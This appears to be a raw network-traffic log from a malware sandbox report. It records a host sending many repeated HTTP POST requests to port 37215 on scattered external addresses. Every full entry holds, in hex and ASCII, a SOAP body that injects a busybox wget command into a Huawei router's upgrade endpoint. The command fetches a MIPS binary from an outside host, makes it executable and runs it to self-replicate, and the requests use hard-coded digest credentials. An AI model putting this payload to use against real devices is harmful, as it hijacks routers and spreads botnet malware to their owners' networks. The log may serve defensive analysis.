                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          748192.168.2.155507041.114.86.20737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.655255079 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          749192.168.2.1555802151.173.195.7737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.655519962 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          750192.168.2.1533270157.142.220.1337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.655563116 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          751192.168.2.1533442197.141.253.8337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.655945063 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          752192.168.2.153527241.215.75.17137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.656002998 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          753192.168.2.1533146143.3.203.5437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.656974077 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          754192.168.2.1555552197.212.211.21737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.657169104 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          755192.168.2.1544296197.142.194.5437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.670825005 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          756192.168.2.1556028197.110.78.14637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.670974016 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          757192.168.2.1541864197.10.253.13737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.636190891 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 